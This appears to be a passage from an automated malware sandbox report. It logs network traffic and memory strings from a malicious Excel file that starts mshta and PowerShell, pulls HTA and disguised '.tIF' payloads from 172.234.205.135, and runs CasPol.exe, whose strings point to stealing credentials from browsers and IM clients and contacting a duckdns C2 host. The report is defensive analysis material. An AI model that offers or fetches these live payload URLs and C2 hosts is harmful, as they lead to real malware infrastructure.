                  Source: unknownHTTPS traffic detected: 193.30.119.205:443 -> 192.168.2.22:49172 version: TLS 1.0
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.234.205.135
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.234.205.135
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.234.205.135
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.234.205.135
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.234.205.135
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.234.205.135
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.234.205.135
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.234.205.135
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.234.205.135
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.234.205.135
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.234.205.135
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.234.205.135
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.234.205.135
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.234.205.135
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.234.205.135
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.234.205.135
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.234.205.135
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.234.205.135
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.234.205.135
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.234.205.135
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.234.205.135
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.234.205.135
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.234.205.135
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.234.205.135
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.234.205.135
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.234.205.135
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.234.205.135
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.234.205.135
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.234.205.135
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.234.205.135
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.234.205.135
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.234.205.135
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.234.205.135
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.234.205.135
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.234.205.135
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.234.205.135
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.234.205.135
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.234.205.135
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.234.205.135
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.234.205.135
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.234.205.135
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.234.205.135
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.234.205.135
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.234.205.135
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.234.205.135
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.234.205.135
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.234.205.135
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.234.205.135
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.234.205.135
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.234.205.135
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_000007FE899C4B18 URLDownloadToFileW,5_2_000007FE899C4B18
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9E11CDD8.emfJump to behavior
                  Source: global trafficHTTP traffic detected: GET /OAffUi?&chairlift=busy&cockpit=blushing&precipitation=honorable&skill=quizzical&timeout HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: provit.ukConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /OAffUi?&chairlift=busy&cockpit=blushing&precipitation=honorable&skill=quizzical&timeout HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: provit.ukConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /OAffUi?&chairlift=busy&cockpit=blushing&precipitation=honorable&skill=quizzical&timeout HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: provit.ukConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /OAffUi?&chairlift=busy&cockpit=blushing&precipitation=honorable&skill=quizzical&timeout HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: provit.ukConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c HTTP/1.1Host: 3105.filemail.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c HTTP/1.1Host: 3105.filemail.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /1244/secs/nicewithgoodthingswhichgosofargoodforeerybody.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 172.234.205.135Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /1244/secs/nicewithgoodthingswhichgosofargoodforeerybody.hta HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Range: bytes=8896-Connection: Keep-AliveHost: 172.234.205.135If-Range: "1e074-627bb40d70f1b"
                  Source: global trafficHTTP traffic detected: GET /1244/creatgoodideaforfuturebusinessdevelopwithnicethingsgetbackon.tIF HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 172.234.205.135Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /1244/secs/nicewithgoodthingswhichgosofargoodforeerybody.hta HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)If-Modified-Since: Mon, 25 Nov 2024 11:44:20 GMTConnection: Keep-AliveHost: 172.234.205.135If-None-Match: "1e074-627bb40d70f1b"
                  Source: global trafficHTTP traffic detected: GET /1244/SRVRSR.txt HTTP/1.1Host: 172.234.205.135Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /1244/SRVRSR.txt HTTP/1.1Host: 172.234.205.135Connection: Keep-Alive
                  Source: bhvD598.tmp.30.drString found in binary or memory: Cookie:user@www.linkedin.com/ equals www.linkedin.com (Linkedin)
                  Source: CasPol.exe, 00000021.00000002.530176368.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
                  Source: CasPol.exe, CasPol.exe, 00000021.00000002.530176368.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
                  Source: CasPol.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                  Source: CasPol.exe, 0000001E.00000002.532205539.000000000011E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: s://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
                  Source: CasPol.exe, 0000001E.00000002.532205539.000000000011E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: s://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
                  Source: bhvD598.tmp.30.drString found in binary or memory: www.linkedin.come equals www.linkedin.com (Linkedin)
                  Source: mshta.exe, 00000004.00000002.429534936.0000000003C1F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427140274.0000000003C1E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.478850860.00000000033C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                  Source: CasPol.exe, 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
                  Source: CasPol.exe, 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
                  Source: global trafficDNS traffic detected: DNS query: provit.uk
                  Source: global trafficDNS traffic detected: DNS query: 3105.filemail.com
                  Source: global trafficDNS traffic detected: DNS query: newbeggin.duckdns.org
                  Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                  Source: mshta.exe, 00000004.00000003.427140274.0000000003C5C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429534936.0000000003C5C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.479530310.00000000033A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.205.135/
                  Source: powershell.exe, 00000005.00000002.448423237.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.486539543.00000000022FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.234.205.135/1244/crea
                  Source: powershell.exe, 00000012.00000002.486539543.00000000022FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.234.205.135/1244/creatgoodideaforfuturebusinessdevelopwithnicethingsgetbackon.tIF
                  Source: powershell.exe, 00000012.00000002.490397083.000000001AD05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.205.135/1244/creatgoodideaforfuturebusinessdevelopwithnicethingsgetbackon.tIF.dll
                  Source: powershell.exe, 00000005.00000002.453548568.000000001A907000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.205.135/1244/creatgoodideaforfuturebusinessdevelopwithnicethingsgetbackon.tIF.dlli2h
                  Source: powershell.exe, 00000005.00000002.454661113.000000001C25F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.493454203.000000001C1C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.205.135/1244/creatgoodideaforfuturebusinessdevelopwithnicethingsgetbackon.tIFC:
                  Source: powershell.exe, 00000005.00000002.448423237.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.486539543.00000000022FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.234.205.135/1244/creatgoodideaforfuturebusinessdevelopwithnicethingsgetbackon.tIFp
                  Source: mshta.exe, 00000010.00000003.478821092.0000000000422000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.479560471.0000000003405000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.478850860.0000000003405000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.467588061.00000000033BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.205.135/1244/secs/nicewithgoodthingswhichgosofargoodforeerybody.hta
                  Source: mshta.exe, 00000010.00000003.470316300.0000000000435000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.205.135/1244/secs/nicewithgoodthingswhichgosofargoodforeerybody.hta...
                  Source: mshta.exe, 00000010.00000003.470316300.0000000000435000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.205.135/1244/secs/nicewithgoodthingswhichgosofargoodforeerybody.hta...?L5.
                  Source: mshta.exe, 00000004.00000002.428662532.0000000000147000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.428612562.0000000000147000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.425003533.0000000000154000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.205.135/1244/secs/nicewithgoodthingswhichgosofargoodforeerybody.hta.NET4.0E)
                  Source: mshta.exe, 00000004.00000003.427140274.0000000003C5C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429534936.0000000003C5C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.470419900.0000000003405000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.470419900.00000000033C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.473015437.0000000003405000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.467588061.0000000003405000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.479560471.0000000003405000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.478850860.0000000003405000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.467588061.00000000033BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.205.135/1244/secs/nicewithgoodthingswhichgosofargoodforeerybody.htaC:
                  Source: mshta.exe, 00000004.00000002.429003088.0000000003BE0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.479236959.0000000000422000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.470316300.0000000000435000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.478821092.0000000000422000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.205.135/1244/secs/nicewithgoodthingswhichgosofargoodforeerybody.htae
                  Source: mshta.exe, 00000004.00000003.427071781.0000000002F25000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427222699.0000000002F25000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.476827470.0000000002E85000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.472367712.0000000002E85000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.234.205.135/1244/secs/nicewithgoodthingswhichgosofargoodforeerybody.htahttp://172.234.205
                  Source: mshta.exe, 00000004.00000003.425003533.0000000000111000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.470316300.0000000000422000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.205.135/1244/secs/nicewithgoodthingswhichgosofargoodforeerybody.htakill=qu
                  Source: mshta.exe, 00000004.00000002.428662532.00000000000FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.478821092.000000000040D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.479236959.00000000003BE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.479236959.000000000040E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.470316300.000000000040E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.205.135/1244/secs/nicewithgoodthingswhichgosofargoodforeerybody.htakill=quizzical&tim
                  Source: mshta.exe, 00000004.00000002.429003088.0000000003BE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.205.135/1244/secs/nicewithgoodthingswhichgosofargoodforeerybody.htan
                  Source: mshta.exe, 00000010.00000002.479236959.0000000000422000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.470316300.0000000000435000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.478821092.0000000000422000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.205.135/1244/secs/nicewithgoodthingswhichgosofargoodforeerybody.htao
                  Source: mshta.exe, 00000004.00000003.425003533.0000000000154000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.470316300.0000000000435000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.205.135/1244/secs/nicewithgoodthingswhichgosofargoodforeerybody.htaout
                  Source: mshta.exe, 00000010.00000002.479530310.00000000033A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.205.135/o-5.
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://acdn.adnxs.com/ast/ast.js
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.html
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://b.scorecardresearch.com/beacon.js
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://cache.btrll.com/default/Pix-1x1.gif
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://cdn.at.atwola.com/_media/uac/msn.html
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.js
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://cdn.taboola.com/libtrc/msn-home-network/loader.js
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.png
                  Source: mshta.exe, 00000004.00000002.429534936.0000000003C1F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427140274.0000000003C1E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.478850860.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.470419900.00000000033C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.473015437.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.479560471.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.467588061.00000000033BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                  Source: mshta.exe, 00000004.00000002.429534936.0000000003C1F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427140274.0000000003C1E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.478850860.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.470419900.00000000033C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.473015437.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.479560471.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.467588061.00000000033BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                  Source: mshta.exe, 00000004.00000002.429534936.0000000003C1F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427140274.0000000003C1E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.478850860.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.470419900.00000000033C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.473015437.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.479560471.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.467588061.00000000033BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                  Source: mshta.exe, 00000004.00000002.429534936.0000000003C1F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427140274.0000000003C1E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.478850860.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.470419900.00000000033C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.473015437.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.479560471.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.467588061.00000000033BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                  Source: mshta.exe, 00000004.00000002.429534936.0000000003C1F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427140274.0000000003C1E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.478850860.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.470419900.00000000033C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.473015437.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.479560471.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.467588061.00000000033BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                  Source: mshta.exe, 00000004.00000002.429534936.0000000003C1F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427140274.0000000003C1E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.478850860.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.470419900.00000000033C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.473015437.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.479560471.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.467588061.00000000033BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                  Source: mshta.exe, 00000004.00000002.429534936.0000000003C1F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427140274.0000000003C1E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.478850860.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.470419900.00000000033C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.473015437.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.479560471.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.467588061.00000000033BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://csp.yahoo.com/beacon/csp?src=yahoocom-expect-ct-report-only
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2Fset
                  Source: CasPol.exeString found in binary or memory: http://geoplugin.net/json.gp
                  Source: CasPol.exe, 00000023.00000002.542292669.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                  Source: powershell.exe, 00000005.00000002.448423237.00000000036A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.486539543.00000000022FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids(
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_sh
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto%
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA2oHEB?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA42Hq5?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA42eYr?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA42pjY?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA6K5wX?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA6pevu?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA8I0Dg?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA8uJZv?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAHxwMU?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAJhH73?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAhvyvD?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtB8UA?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtBduP?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtBnuN?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
